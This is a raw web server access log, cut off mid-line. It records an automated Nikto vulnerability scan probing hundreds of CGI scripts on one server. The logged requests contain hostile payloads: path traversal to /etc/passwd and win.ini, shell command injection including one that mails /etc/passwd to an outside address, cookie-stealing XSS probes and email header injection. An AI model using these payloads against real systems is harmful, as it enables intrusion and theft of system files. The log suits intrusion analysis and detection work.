[24/Jul/2003:01:51:18 +0900] "GET /cgi-bin/dig.cgi HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:18 +0900] "GET /cgi.cgi/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:19 +0900] "GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:20 +0900] "GET /cgi.cgi/displayTC.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:21 +0900] "GET /cgi-bin/displayTC.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:21 +0900] "GET /cgi.cgi/dnewsweb HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:22 +0900] "GET /cgi-bin/dnewsweb HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:23 +0900] "GET /cgi.cgi/donothing HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:23 +0900] "GET /cgi-bin/donothing HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:24 +0900] "GET /cgi.cgi/download.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:25 +0900] "GET /cgi-bin/download.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:26 +0900] "GET /cgi.cgi/dumpenv.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:26 +0900] "GET /cgi-bin/dumpenv.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:27 +0900] "GET /cgi.cgi/echo.bat HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:28 +0900] "GET /cgi-bin/echo.bat HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:28 +0900] "GET /cgi.cgi/echo.bat?&dir+c:\\\", HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:29 +0900] "GET /cgi-bin/echo.bat?&dir+c:\\\", HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:30 +0900] "GET /cgi.cgi/edit.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:31 +0900] "GET /cgi-bin/edit.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:31 +0900] "GET /cgi.cgi/empower?DB=whateverwhatever HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:32 +0900] "GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:33 +0900] "GET /cgi.cgi/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:33 +0900] "GET /cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:34 +0900] "GET /cgi.cgi/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:35 +0900] "GET /cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:36 +0900] "GET /cgi.cgi/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:36 +0900] "GET /cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:37 +0900] "GET /cgi.cgi/enter.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:38 +0900] "GET /cgi-bin/enter.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:38 +0900] "GET /cgi.cgi/environ.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:39 +0900] "GET /cgi-bin/environ.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:40 +0900] "GET /cgi.cgi/environ.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:41 +0900] "GET /cgi-bin/environ.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:41 +0900] "GET /cgi.cgi/environ.pl?param1=<script>alert(document.cookie)</script> HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:42 +0900] "GET /cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script> HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:43 +0900] "GET /cgi.cgi/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.0" 403 344 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:43 +0900] "GET /cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.0" 404 340 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:44 +0900] "GET /cgi.cgi/eshop.pl/seite=;cat%20eshop.pl| HTTP/1.0" 403 313 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:45 +0900] "GET /cgi-bin/eshop.pl/seite=;cat%20eshop.pl| HTTP/1.0" 404 309 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:46 +0900] "GET /cgi.cgi/ex-logger.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:46 +0900] "GET /cgi-bin/ex-logger.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:47 +0900] "GET /cgi.cgi/excite HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:48 +0900] "GET /cgi-bin/excite HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:48 +0900] "GET /cgi.cgi/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd|mail test@test.com HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:51:49 +0900] "GET /cgi-bin/excite;IFS=\\\"$\\\";/bin/cat /etc/passwd|mail test@test.com HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:51:50 +0900] "GET /cgi.cgi/ezadmin.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:51 +0900] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:51 +0900] "GET /cgi.cgi/ezboard.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:52 +0900] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:53 +0900] "GET /cgi.cgi/ezman.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:54 +0900] "GET /cgi-bin/ezman.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:54 +0900] "GET /cgi.cgi/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.0" 403 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:55 +0900] "GET /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:56 +0900] "GET /cgi.cgi/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:56 +0900] "GET /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:57 +0900] "GET /cgi.cgi/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:58 +0900] "GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:59 +0900] "GET /cgi.cgi/faxsurvey?cat%20/etc/passwd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:59 +0900] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:00 +0900] "GET /cgi.cgi/filemail HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:01 +0900] "GET /cgi-bin/filemail HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:01 +0900] "GET /cgi.cgi/filemail.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:02 +0900] "GET /cgi-bin/filemail.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:03 +0900] "GET /cgi.cgi/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:06 +0900] "GET /cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:07 +0900] "GET /cgi.cgi/FileSeek.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:08 +0900] "GET /cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:09 +0900] "GET /cgi.cgi/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:10 +0900] "GET /cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:11 +0900] "GET /cgi.cgi/FileSeek.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:12 +0900] "GET /cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:13 +0900] "GET /cgi.cgi/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:13 +0900] "GET /cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:14 +0900] "GET /cgi.cgi/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:14 +0900] "GET /favicon.ico HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:52:15 +0900] "GET /cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:15 +0900] "GET /~tttttt/info.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2974 "http://mydomain.xxx.xxx.xxx/~tttttt/info.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:52:15 +0900] "GET /~tttttt/info.php HTTP/1.1" 200 44273 "http://www.google.nl/search?as_q=&num=10&hl=nl&ie=UTF-8&oe=UTF-8&btnG=Google+zoeken&as_epq=info.php&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=url&as_dt=i&as_sitesearch=jp" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:52:15 +0900] "GET /~tttttt/info.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 4453 "http://mydomain.xxx.xxx.xxx/~tttttt/info.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:52:17 +0900] "GET /cgi.cgi/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:17 +0900] "GET /cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:18 +0900] "GET /cgi.cgi/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:19 +0900] "GET /cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:19 +0900] "GET /cgi.cgi/finger HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:20 +0900] "GET /cgi-bin/finger HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:21 +0900] "GET /cgi.cgi/finger.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:22 +0900] "GET /cgi-bin/finger.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:22 +0900] "GET /cgi.cgi/finger.pl HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:23 +0900] "GET /cgi-bin/finger.pl HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:24 +0900] "GET /cgi.cgi/flexform HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:24 +0900] "GET /cgi-bin/flexform HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:25 +0900] "GET /cgi.cgi/flexform.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:26 +0900] "GET /cgi-bin/flexform.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:27 +0900] "GET /cgi.cgi/fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:27 +0900] "GET /cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:28 +0900] "GET /cgi.cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:29 +0900] "GET /cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:29 +0900] "GET /cgi.cgi/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:30 +0900] "GET /cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:31 +0900] "GET /cgi.cgi/formmail HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:32 +0900] "GET /cgi-bin/formmail HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:32 +0900] "GET /cgi.cgi/formmail.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:33 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:34 +0900] "GET /cgi.cgi/FormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script> HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:34 +0900] "GET /cgi-bin/FormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:35 +0900] "GET /cgi.cgi/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:36 +0900] "GET /cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:37 +0900] "GET /cgi.cgi/formmail.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:37 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:38 +0900] "GET /cgi.cgi/formmail.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:39 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:39 +0900] "GET /cgi.cgi/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:40 +0900] "GET /cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:41 +0900] "GET /cgi.cgi/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:42 +0900] "GET /cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:42 +0900] "GET /cgi.cgi/ftp.pl HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:43 +0900] "GET /cgi-bin/ftp.pl HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:44 +0900] "GET /cgi.cgi/gbook/gbook.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:44 +0900] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:45 +0900] "GET /cgi.cgi/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:46 +0900] "GET /cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:47 +0900] "GET /cgi.cgi/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:47 +0900] "GET /cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:48 +0900] "GET /cgi.cgi/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:49 +0900] "GET /cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:49 +0900] "GET /cgi.cgi/get32.exe HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:50 +0900] "GET /cgi-bin/get32.exe HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:51 +0900] "GET /cgi.cgi/getdoc.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:52 +0900] "GET /cgi-bin/getdoc.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:52 +0900] "GET /cgi.cgi/gettransbitmap HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:53 +0900] "GET /cgi-bin/gettransbitmap HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:54 +0900] "GET /cgi.cgi/gH.cgi HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:54 +0900] "GET /cgi-bin/gH.cgi HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:55 +0900] "GET /cgi.cgi/glimpse HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:56 +0900] "GET /cgi-bin/glimpse HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:57 +0900] "GET /cgi.cgi/gm-authors.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:57 +0900] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:58 +0900] "GET /cgi.cgi/gm-cplog.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:59 +0900] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:52:59 +0900] "GET /cgi.cgi/gm.cgi HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:00 +0900] "GET /cgi-bin/gm.cgi HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:01 +0900] "GET /cgi.cgi/guestbook.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:02 +0900] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:02 +0900] "GET /cgi.cgi/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd| HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:03 +0900] "GET 